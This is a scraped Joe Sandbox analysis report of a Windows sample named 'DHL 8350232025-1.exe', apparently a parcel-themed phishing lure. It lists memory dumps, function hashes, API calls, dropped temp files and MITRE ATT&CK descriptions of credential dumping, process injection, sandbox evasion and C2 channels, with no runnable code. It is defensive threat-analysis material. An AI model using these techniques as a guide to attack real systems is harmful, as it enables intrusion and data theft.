Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8bb1447902af0dd0c29cb3cf8d2a5dcd10a6a07be83ce366cadcb25299d8a983
Instruction ID: e7ee247d6d5b6106ccc76ab62d0e1cea407576e0de81fa169514c7822a28be81
Opcode Fuzzy Hash: 8bb1447902af0dd0c29cb3cf8d2a5dcd10a6a07be83ce366cadcb25299d8a983
Instruction Fuzzy Hash: B3D0C9723D13107AE668A770AC4FFC6B6189B45B10F5149167645BA1D1C9A0A8518B54

Function 001DBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 001DBE93
GetLastError.KERNEL32 ref: 001DBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001DBEFC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: a363d4faf45bfbe32c02bf5e9ddd273b54a94ca079bd89ca33d26de0f6fea4cd
Instruction ID: 74981f64dc07b36e26639c44b4e15711a21daed37db84c33db797a0f1749aed6
Opcode Fuzzy Hash: a363d4faf45bfbe32c02bf5e9ddd273b54a94ca079bd89ca33d26de0f6fea4cd
Instruction Fuzzy Hash: 5141E435608246EFCF258F65CCC4BBA7BA5AF51320F26416AF95A973A1DB309C01DB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL 8350232025-1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\trickstress

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
DHL 8350232025-1.exe

Function 001A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 001E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 001A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 001E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 001A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 001A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 001A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01387530 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 001A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01387300 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Function 001A3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 013861F0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 001A3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre